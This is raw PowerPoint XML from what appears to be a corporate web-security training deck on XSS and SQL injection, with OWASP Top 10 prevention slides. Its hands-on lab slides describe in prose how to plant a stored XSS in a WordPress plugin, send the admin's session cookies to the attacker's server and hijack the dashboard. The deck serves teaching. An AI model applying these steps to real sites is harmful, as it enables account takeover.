            <a:ext cx="85584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XSS vulnerability is documented at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0"/>
              <a:t>http://LabIP:80/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This XSS occurs at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin dashboard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In your SSH, check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TODO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> for sending HTTP requests. And </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/root/login.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> is an HTTP request template for you to modify for the XSS.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24200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Hints ahead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4162" y="1447800"/>
            <a:ext cx="6635675" cy="44065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38736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Challenges Hints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4300" y="1066800"/>
            <a:ext cx="8555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/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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To gain the WordPress admin, you need the admin’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session cookie(s)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.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As you have the Apache server on port 80, you can abuse the stored XSS to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send the session cookie(s) to you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.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/>
              <a:t>You can check the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/log/apache2/access.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> for the sent back cookie(s). (the admin checks the dashboard every 15 seconds)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/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Add the session cookie(s) with Cookie Manager+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in Firefox then access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-admin/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>for the admin dashboard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24897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auto">
          <a:xfrm>
            <a:off x="360000" y="914400"/>
            <a:ext cx="8206951" cy="51816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Solution Flow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4944" y="1282699"/>
            <a:ext cx="1460501" cy="1460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5953" y="1282699"/>
            <a:ext cx="1460501" cy="14605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4124" y="914400"/>
            <a:ext cx="103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91045" y="914400"/>
            <a:ext cx="254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Victim WordPress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05734" y="2688104"/>
            <a:ext cx="2584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SSH on port 443</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with Apache on port 80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4876" y="2712622"/>
            <a:ext cx="1543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victim admin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Left-Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="3538614"/>
            <a:ext cx="1653546" cy="597716"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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2. Admin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login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07536" y="2743200"/>
            <a:ext cx="2584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stored XSS with Activity Log plugin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FC8FBC47-B668-446B-B697-583FF3004EB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3766351" y="1066800"/>
            <a:ext cx="0" cy="4953000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:prstDash val="lgDash"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="88900" dist="38100" dir="81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8106B2E9-67B5-47B0-8741-923DEC2A8F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994" y="1465767"/>
            <a:ext cx="1125033" cy="11250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58CD534-58B9-489D-A453-A28E0AB7695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5" t="298" r="20364" b="-298"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="385400" y="1143000"/>
            <a:ext cx="1066800" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Left-Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2825203" y="3380475"/>
            <a:ext cx="1822995" cy="475312"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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1. Plant the XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Left-Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2135194" y="3962400"/>
            <a:ext cx="2889796" cy="989693"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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3. XSS triggered</a:t>
            </a:r>
          </a:p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access to </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a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tkr’s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Apache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="U-Turn Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3803946" y="3118147"/>
            <a:ext cx="815629" cy="4835276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7030A0"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/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vert="vert270" wrap="none" rtlCol="0" anchor="b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kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. Force admin to send his session cookies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97427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28600" y="381000"/>
            <a:ext cx="8686800" cy="2743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4400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Thank you!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Your feedback make us better.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2400" u="sng" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Please find the Survey Monkey link in your Inbox!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" dirty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marL="0" lvl="0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="4000" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C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8274" y="3429000"/>
            <a:ext cx="4483027" cy="3252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80420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Appendix: Reference - OWASP Top 10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A2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="ja-JP" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r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 Broken Authentication and Session Management</a:t>
            </a:r>
          </a:p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Preventions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Meet all requirements defined in the OWASP ASVS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OWASP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: https://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www.owasp.org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/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index.php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/Top_10_2013-A2-Broken_Authentication_and_Session_Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OWASP ASVS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: https://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www.owasp.org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/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index.php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/Category:OWASP_Application_Security_Verification_Standard_Project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0954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Appendix: Reference - OWASP Top 10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A4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="ja-JP" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r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 Insecure Direct Object References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Unauthorized access to pages or resources, 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ex: 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MyPage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 of other users</a:t>
            </a:r>
          </a:p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Preventions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Strictly check session of user before access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OWASP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: https://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www.owasp.org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/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index.php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/Top_10_2013-A4-Insecure_Direct_Object_References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2227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What is XSS?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Cross-Site Scripting, aka XSS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0" y="1473200"/>
            <a:ext cx="7543800" cy="4165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02/22</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="「meme why」的圖片搜尋結果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6402750" y="4000500"/>
            <a:ext cx="2381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23138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Appendix: Reference - OWASP Top 10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A5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="ja-JP" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r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 Security Misconfiguration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Frameworks, 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Middlewares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, Servers and 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etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p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Preventions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Proper hardening procedure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Process of version/patch control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Regular scanning process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OWASP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: https://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www.owasp.org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/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index.php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/Top_10_2013-A5-Security_Misconfiguration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78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Appendix: Reference - OWASP Top 10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A6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="ja-JP" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r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 Sensitive Data Exposure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Sensitive data accessible yet unencrypted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Weak key/algorithm is used</a:t>
            </a:r>
          </a:p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Preventions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Encrypt all sensitive data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Don’t store sensitive data unless necessary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Strong key and encryption algorithm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Proper key management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OWASP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: https://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www.owasp.org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/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index.php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/Top_10_2013-A6-Sensitive_Data_Exposure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95604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Appendix: Reference - OWASP Top 10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A7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="ja-JP" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r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 Missing Function Level Access Control</a:t>
            </a:r>
          </a:p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Preventions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Prevent to hard code controls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Deny all access by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OWASP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: https://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www.owasp.org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/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index.php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/Top_10_2013-A7-Missing_Function_Level_Access_Control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8603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Appendix: Reference - OWASP Top 10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A8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="ja-JP" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r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 Cross Site Request Forgery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Ability to force victims to perform unwanted actions on web application</a:t>
            </a:r>
          </a:p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Preventions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Provide one time unique tokens (CSRF tokens) to users prior to all important functions (Ex: Checkout)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OWASP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: https://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www.owasp.org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/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index.php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/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)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42269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Appendix: Reference - OWASP Top 10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A9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="ja-JP" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r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 Using Components with Known Vulnerabilities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Ex: Struts 2 remote code execution</a:t>
            </a:r>
          </a:p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Preventions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Asset management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Monitor security updates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Establish security policies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Disable or remove unnecessary functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OWASP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: https://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www.owasp.org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/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index.php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/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities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51566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Appendix: Reference - OWASP Top 10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A10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="ja-JP" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r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en-US" altLang="ja-JP" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Unvalidated</a:t>
            </a:r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 Redirects and Forwards</a:t>
            </a:r>
          </a:p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Preventions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Avoid using redirects and forwards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If using redirect and forwards are necessary, avoid using user provided parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Use whitelisting if possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OWASP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: https://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www.owasp.org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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>/Top_10_2013-A10-Unvalidated_Redirects_and_Forwards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9949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0" y="1752600"/>
            <a:ext cx="3873499" cy="38734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200" y="3277800"/>
            <a:ext cx="760800" cy="7608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What is XSS?</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP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3" y="914400"/>
            <a:ext cx="7775575" cy="52577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The ability to inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Client Side Scripts or HTML tags </a:t>
            </a:r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via a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>vulnerable web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Client Side Scripts executes in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>victim’s browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2400" u="sng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2499" y="2667000"/>
            <a:ext cx="1460501" cy="1460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0300" y="4807411"/>
            <a:ext cx="1054100" cy="10599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1589" y="3161672"/>
            <a:ext cx="895811" cy="895811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Up-Down Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7893050" y="4217000"/>
            <a:ext cx="228600" cy="507400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88900" dist="38100" dir="8100000" algn="tr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="30000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:extLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"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43900" y="254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03/22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00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85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Corporate_confidential_b">
  <a:themeElements>
    <a:clrScheme name="R-style col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BF0000"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="F06E5A"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="F0AA5A"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="C8DC46"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="00AAE6"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="0078BE"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0000FF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="800080"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="R-style font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53800">
              <a:srgbClr val="A30000"/>
            </a:gs>
            <a:gs pos="0">
              <a:srgbClr val="820000"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="BF0000"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="10800000" scaled="1"/>
          <a:tileRect/>
        </a:gradFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="88900" dist="38100" dir="8100000" algn="tr" rotWithShape="0">
            <a:prstClr val="black">
              <a:alpha val="30000"/>
            </a:prstClr>
          </a:outerShdw>
        </a:effectLst>
        <a:extLst/>
      </a:spPr>
      <a:bodyPr wrap="none" anchor="ctr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ysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:spDef>
    <a:lnDef>
      <a:spPr>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:headEnd type="none" w="med" len="med"/>
          <a:tailEnd type="none" w="med" len="med"/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="88900" dist="38100" dir="8100000" algn="ctr" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="30000"/>
            </a:srgbClr>
          </a:outerShd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9" id="{E5B61883-B365-E64E-BB31-29C03CACAD62}" vid="{46C390E2-4D89-D54E-BFC9-835F6B43F0E6}"/>
    </a:ext>
  </a:ext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L2_XSS</Template>
  <TotalTime>23427</TotalTime>
  <Words>3290</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>692</Paragraphs>
  <Slides>85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0" baseType="lpstr">
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Corporate_confidential_b</vt:lpstr>
      <vt:lpstr>Security Threats Hands On Web</vt:lpstr>
      <vt:lpstr>Preparation Check</vt:lpstr>
      <vt:lpstr>whoami</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Target Audiences</vt:lpstr>
      <vt:lpstr>Common Questions</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>What is XSS?</vt:lpstr>
      <vt:lpstr>What is XSS?</vt:lpstr>
      <vt:lpstr>What is XSS?</vt:lpstr>
      <vt:lpstr>A simple example of XSS</vt:lpstr>
      <vt:lpstr>A simple example of XSS</vt:lpstr>
      <vt:lpstr>A simple example of XSS</vt:lpstr>
      <vt:lpstr>A simple example of XSS</vt:lpstr>
      <vt:lpstr>3 types of XSS</vt:lpstr>
      <vt:lpstr>3 types of XSS</vt:lpstr>
      <vt:lpstr>3 types of XSS</vt:lpstr>
      <vt:lpstr>3 types of XSS</vt:lpstr>
      <vt:lpstr>3 types of XSS</vt:lpstr>
      <vt:lpstr>3 types of XSS</vt:lpstr>
      <vt:lpstr>3 types of XSS</vt:lpstr>
      <vt:lpstr>3 types of XSS</vt:lpstr>
      <vt:lpstr>3 types of XSS</vt:lpstr>
      <vt:lpstr>What you can do with XSS</vt:lpstr>
      <vt:lpstr>What you can do with XSS</vt:lpstr>
      <vt:lpstr>Question</vt:lpstr>
      <vt:lpstr>General XSS Defenses</vt:lpstr>
      <vt:lpstr>General XSS Defenses</vt:lpstr>
      <vt:lpstr>General XSS Defenses for DOM based</vt:lpstr>
      <vt:lpstr>Reference - OWASP Top 10</vt:lpstr>
      <vt:lpstr>Hands On Time</vt:lpstr>
      <vt:lpstr>Hands On Time</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>What is SQL Injection?</vt:lpstr>
      <vt:lpstr>The very basic SQL query</vt:lpstr>
      <vt:lpstr>Behind the login function</vt:lpstr>
      <vt:lpstr>Behind the login function</vt:lpstr>
      <vt:lpstr>Bypassing the login with SQLi</vt:lpstr>
      <vt:lpstr>Bypassing the login with SQLi</vt:lpstr>
      <vt:lpstr>Bypassing the login with SQLi</vt:lpstr>
      <vt:lpstr>Question</vt:lpstr>
      <vt:lpstr>Detecting SQLi</vt:lpstr>
      <vt:lpstr>Detecting SQLi</vt:lpstr>
      <vt:lpstr>In the case of Login</vt:lpstr>
